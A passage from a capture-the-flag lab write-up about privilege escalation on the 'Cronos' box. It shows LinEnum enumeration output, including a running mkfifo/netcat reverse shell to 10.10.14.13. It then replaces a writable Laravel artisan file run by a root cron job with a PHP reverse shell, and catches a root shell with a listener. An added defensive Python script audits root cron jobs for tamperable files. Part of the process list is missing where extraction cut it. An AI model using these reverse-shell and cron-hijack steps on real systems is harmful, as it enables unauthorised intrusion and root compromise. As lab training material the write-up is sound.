root 170 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_11]
root 177 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_12]
root 178 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_12]
root 179 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_13]
root 180 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_13]
root 184 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_14]
root 186 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_14]
root 189 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_15]
root 191 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_15]
root 192 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_16]
root 195 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_16]
root 196 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_17]
root 198 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_17]
root 199 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_18]
root 201 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_18]
root 204 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_19]
root 206 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_19]
root 208 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_20]
root 211 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_20]
root 212 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_21]
root 214 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_21]
root 216 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_22]
root 218 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_22]
root 220 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_23]
root 222 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_23]
root 223 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_24]
root 224 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_24]
root 225 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_25]
root 226 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_25]
root 227 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_26]
root 228 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_26]
root 229 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_27]
root 230 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_27]
root 231 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_28]
root 232 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_28]
root 233 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_29]
root 234 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_29]
root 235 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_30]
root 236 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_30]
root 237 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_31]
root 238 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_31]
root 239 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_32]
root 240 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_32]
root 265 0.0 0.0 0 0 ? S 10:48 0:00 [kworker/u2:28]
root 266 0.0 0.0 0 0 ? S 10:48 0:00 [kworker/u2:29]
root 339 0.0 0.0 0 0 ? S< 10:48 0:00 [raid5wq]
root 364 0.0 0.0 0 0 ? S< 10:48 0:00 [kdmflush]
root 365 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 375 0.0 0.0 0 0 ? S< 10:48 0:00 [kdmflush]
root 376 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 393 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset]
root 421 0.0 0.0 0 0 ? S 10:48 0:00 [jbd2/dm-0-8]
root 422 0.0 0.0 0 0 ? S< 10:48 0:00 [ext4-rsv-conver]
root 466 0.0 0.0 0 0 ? S< 10:48 0:00 [kworker/0:1H]
root 478 0.0 0.0 0 0 ? S< 10:48 0:00 [iscsi_eh]
root 488 0.0 0.0 0 0 ? S< 10:48 0:00 [ib_addr]
root 490 0.0 0.3 28500 3180 ? Ss 10:48 0:00 /lib/systemd/systemd-journald
root 498 0.0 0.0 0 0 ? S 10:48 0:00 [kauditd]
root 503 0.0 0.0 0 0 ? S< 10:48 0:00 [ib_mcast]
root 509 0.0 0.0 0 0 ? S< 10:48 0:00 [ib_nl_sa_wq]
root 513 0.0 0.0 0 0 ? S< 10:48 0:00 [ib_cm]
root 514 0.0 0.0 0 0 ? S< 10:48 0:00 [iw_cm_wq]
root 515 0.0 0.1 102968 1536 ? Ss 10:48 0:00 /sbin/lvmetad -f
root 517 0.0 0.0 0 0 ? S< 10:48 0:00 [rdma_cm]
root 540 0.0 0.3 44700 4040 ? Ss 10:48 0:00 /lib/systemd/systemd-udevd
root 782 0.0 0.0 0 0 ? S< 10:48 0:00 [ext4-rsv-conver]
systemd+ 819 0.0 0.2 100324 2264 ? Ssl 10:48 0:00 /lib/systemd/systemd-timesyncd
message+ 929 0.0 0.3 42940 3896 ? Ss 10:48 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 951 0.0 0.2 29008 2756 ? Ss 10:48 0:00 /usr/sbin/cron -f
root 952 0.0 0.5 275860 6056 ? Ssl 10:48 0:00 /usr/lib/accountsservice/accounts-daemon
root 953 0.0 0.1 95368 1392 ? Ssl 10:48 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
syslog 954 0.0 0.3 256396 3268 ? Ssl 10:48 0:00 /usr/sbin/rsyslogd -n
daemon 957 0.0 0.2 26044 2068 ? Ss 10:48 0:00 /usr/sbin/atd -f
root 963 0.0 1.9 266532 20288 ? Ssl 10:48 0:00 /usr/lib/snapd/snapd
root 967 0.0 0.1 20100 1128 ? Ss 10:48 0:00 /lib/systemd/systemd-logind
root 969 0.1 1.0 192236 10196 ? Ssl 10:48 0:01 /usr/bin/vmtoolsd
root 989 0.0 0.1 4400 1292 ? Ss 10:48 0:00 /usr/sbin/acpid
root 1036 0.0 0.0 13376 152 ? Ss 10:48 0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root 1037 0.0 0.5 277180 5924 ? Ssl 10:48 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 1190 0.0 0.5 65520 5828 ? Ss 10:48 0:00 /usr/sbin/sshd -D
bind 1191 0.0 1.9 208376 19556 ? Ssl 10:48 0:00 /usr/sbin/named -f -u bind -4
root 1217 0.0 0.0 5224 140 ? Ss 10:48 0:00 /sbin/iscsid
root 1218 0.0 0.3 5724 3516 ? S
[process entries between this point and the reverse-shell process were lost during extraction]
...&1|nc 10.10.14.13 445 >/tmp/f
www-data 3995 0.0 0.0 4536 724 ? S 11:12 0:00 cat /tmp/f
www-data 3996 0.0 0.3 18216 3304 ? S 11:12 0:00 /bin/bash -i
www-data 3997 0.0 0.1 11304 1656 ? S 11:12 0:00 nc 10.10.14.13 445
www-data 4020 0.0 0.3 19028 4024 ? S 11:14 0:00 /bin/bash ./linenum.sh
www-data 4021 0.0 0.3 19072 3528 ? S 11:14 0:00 /bin/bash ./linenum.sh
www-data 4022 0.0 0.0 4384 672 ? S 11:14 0:00 tee -a
www-data 4223 0.0 0.2 19056 2828 ? S 11:15 0:00 /bin/bash ./linenum.sh
www-data 4224 0.0 0.2 34424 3000 ? R 11:15 0:00 ps aux

### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.16

[-] MYSQL version:
mysql Ver 14.14 Distrib 5.7.17, for Linux (x86_64) using EditLine wrapper

[-] Apache version:
Server version: Apache/2.4.18 (Ubuntu)
Server built: 2016-07-14T12:32:26

[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data

[-] Installed Apache modules:
Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
access_compat_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php7_module (shared)
setenvif_module (shared)
status_module (shared)

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/curl

[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1667 Apr 9 2017 /etc/passwd
-rw-r--r-- 1 root root 832 Apr 9 2017 /etc/group
-rw-r--r-- 1 root root 575 Oct 22 2015 /etc/profile
-rw-r----- 1 root shadow 1191 Apr 9 2017 /etc/shadow

[-] SUID files:
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Dec 16 2016 /bin/umount
-rwsr-xr-x 1 root root 40152 Dec 16 2016 /bin/mount
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40128 Mar 29 2016 /bin/su
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 38984 Mar 7 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 56456 Feb 24 2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14864 Jan 18 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 428240 Aug 11 2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 40432 Mar 29 2016 /usr/bin/chsh
-rwsr-xr-x 1 root root 32944 Mar 29 2016 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 136808 Jan 20 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 49584 Mar 29 2016 /usr/bin/chfn
-rwsr-xr-x 1 root root 39904 Mar 29 2016 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 51464 Jan 15 2016 /usr/bin/at
-rwsr-xr-x 1 root root 23376 Jan 18 2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 32944 Mar 29 2016 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75304 Mar 29 2016 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 54256 Mar 29 2016 /usr/bin/passwd

[-] SGID files:
-rwxr-sr-x 1 root shadow 35600 Mar 16 2016 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 35632 Mar 16 2016 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root utmp 434216 Feb 7 2016 /usr/bin/screen
-rwxr-sr-x 1 root ssh 358624 Aug 11 2016 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 39520 Nov 18 2014 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 62336 Mar 29 2016 /usr/bin/chage
-rwxr-sr-x 1 root crontab 36080 Apr 6 2016 /usr/bin/crontab
-rwsr-sr-x 1 daemon daemon 51464 Jan 15 2016 /usr/bin/at
-rwxr-sr-x 1 root tty 27368 Dec 16 2016 /usr/bin/wall
-rwxr-sr-x 1 root tty 14752 Mar 1 2016 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 22768 Mar 29 2016 /usr/bin/expiry

[+] Files with POSIX capabilities set:
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep

[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 4781 Mar 17 2016 /etc/hdparm.conf
-rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf
-rw-r--r-- 1 root root 552 Mar 16 2016 /etc/pam.conf
-rw-r--r-- 1 root root 967 Oct 30 2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 7788 Mar 22 2017 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 338 Nov 18 2014 /etc/updatedb.conf
-rw-r--r-- 1 root root 100 Nov 25 2015 /etc/sos.conf
-rw-r--r-- 1 root root 1371 Jan 28 2016 /etc/rsyslog.conf
-rw-r--r-- 1 root root 350 Mar 22 2017 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 2084 Sep 6 2015 /etc/sysctl.conf
-rw-r--r-- 1 root root 604 Jul 2 2015 /etc/deluser.conf
-rw-r--r-- 1 root root 2969 Nov 10 2015 /etc/debconf.conf
-rw-r--r-- 1 root root 1260 Mar 16 2016 /etc/ucf.conf
-rw-r--r-- 1 root root 6816 Nov 30 2016 /etc/overlayroot.conf
-rw-r--r-- 1 root root 497 May 4 2014 /etc/nsswitch.conf
-rw-r--r-- 1 root root 3028 Feb 15 2017 /etc/adduser.conf
-rw-r--r-- 1 root root 92 Oct 22 2015 /etc/host.conf
-rw-r--r-- 1 root root 34 Jan 27 2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 191 Jan 19 2016 /etc/libaudit.conf
-rw-r--r-- 1 root root 14867 Apr 12 2016 /etc/ltrace.conf
-rw-r--r-- 1 root root 2584 Feb 18 2016 /etc/gai.conf
-rw-r--r-- 1 root root 703 May 6 2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 771 Mar 6 2015 /etc/insserv.conf
-rw-r--r-- 1 root root 144 Mar 22 2017 /etc/kernel-img.conf
```

### Exploitation

During our post-exploitation enumeration we saw the following cron job running every minute as root: `php /var/www/laravel/artisan schedule:run`

The `artisan` file is owned and writable by `www-data`, the user we already run as, so root is executing a file under our control, which makes this a viable privilege escalation vector.

```bash
www-data@cronos:/var/www/laravel$ ls -la artisan
-rwxr-xr-x 1 www-data www-data 1646 Apr 9 2017 artisan
```
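A check a defender could run for exactly this misconfiguration, added here and not part of the write-up: it parses a system crontab, keeps the jobs that run as root, and reports any referenced file (or its parent directory) that is not root-owned or is group/world-writable. The crontab lines are the ones shown in the LinEnum output; the ownership table `DEMO_FACTS` is constructed to mirror the `ls -la artisan` result above, and `stat_lookup` runs the same check against the live filesystem.

```python
"""Find root cron jobs that execute files a non-root user can change.

Added example, not tooling from the write-up. CRONTAB holds the lines from
the LinEnum output; DEMO_FACTS is a constructed ownership table mirroring
`ls -la artisan` on the box (owner www-data, mode 0755). stat_lookup runs
the same check against the live filesystem.
"""
import os
import pwd
import re
import stat
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple

CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""


@dataclass
class FileFacts:
    owner: str
    mode: int  # permission bits only (stat.S_IMODE)


# Constructed to mirror the target; paths not listed are simply skipped.
DEMO_FACTS = {
    "/": FileFacts("root", 0o755),
    "/etc/cron.hourly": FileFacts("root", 0o755),
    "/etc/cron.daily": FileFacts("root", 0o755),
    "/usr/sbin": FileFacts("root", 0o755),
    "/usr/sbin/anacron": FileFacts("root", 0o755),
    "/var/www": FileFacts("root", 0o755),
    "/var/www/laravel": FileFacts("www-data", 0o755),
    "/var/www/laravel/artisan": FileFacts("www-data", 0o755),
}

Lookup = Callable[[str], Optional[FileFacts]]


def demo_lookup(path: str) -> Optional[FileFacts]:
    return DEMO_FACTS.get(path)


def stat_lookup(path: str) -> Optional[FileFacts]:
    """Ownership and mode of a real path, or None if it cannot be stat'ed."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return FileFacts(pwd.getpwuid(st.st_uid).pw_name, stat.S_IMODE(st.st_mode))


REDIRECT = re.compile(r"\d*>>?\s*\S+")            # ">> /dev/null", "2>&1"
ABS_PATH = re.compile(r"(?:^|\s)(/[^\s;|&()]*)")  # whitespace-delimited /paths


def parse_system_crontab(text: str) -> List[Tuple[str, str]]:
    """(user, command) pairs from a crontab that carries a user field."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"\w+=", line):
            continue  # blank, comment, or VAR=value line
        special = line.startswith("@")  # @reboot, @daily, ...
        parts = line.split(None, 2) if special else line.split(None, 6)
        if len(parts) == (3 if special else 7):
            jobs.append((parts[-2], parts[-1]))
    return jobs


def referenced_paths(command: str) -> List[str]:
    """Absolute paths the command touches, ignoring redirection targets."""
    return ABS_PATH.findall(REDIRECT.sub(" ", command))


def is_tamperable(path: str, lookup: Lookup) -> bool:
    """Not owned by root, or group/world writable."""
    facts = lookup(path)
    if facts is None:
        return False
    return facts.owner != "root" or bool(facts.mode & 0o022)


def audit(text: str, lookup: Lookup) -> List[Tuple[str, str]]:
    """(tamperable path, command) for every root job that references one.
    The parent directory is checked too: a writable directory lets the
    file be replaced even when the file itself is root-owned."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for path in referenced_paths(command):
            for candidate in (path, os.path.dirname(path) or "/"):
                if is_tamperable(candidate, lookup):
                    findings.append((candidate, command))
                    break
    return findings


if __name__ == "__main__":
    for path, command in audit(CRONTAB, demo_lookup):
        print(f"root job uses tamperable path {path}: {command}")
```

Against the live system the same call is `audit(open("/etc/crontab").read(), stat_lookup)`, repeated for each file in `/etc/cron.d`. The interpreter on the page's job (`php`) is resolved through `PATH` and is not an absolute path, so it is not inspected here; the script file it runs is, and that is the one a web-application user owns.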

We replace `artisan` with a PHP reverse shell, fetched from our machine onto the target under the same file name, start a listener and wait for the cron job to fire.

```bash
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.13 - - [06/May/2023 10:23:28] "GET /artisan HTTP/1.1" 200 -
```

```bash
nc -nlvp 445
listening on [any] 445 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.13] 53728
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
11:24:01 up 35 min, 0 users, load average: 0.00, 0.01, 0.14
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
bash: cannot set terminal process group (4626): Inappropriate ioctl for device
bash: no job control in this shell
root@cronos:/# whoami
whoami
root
root@cronos:/#
```
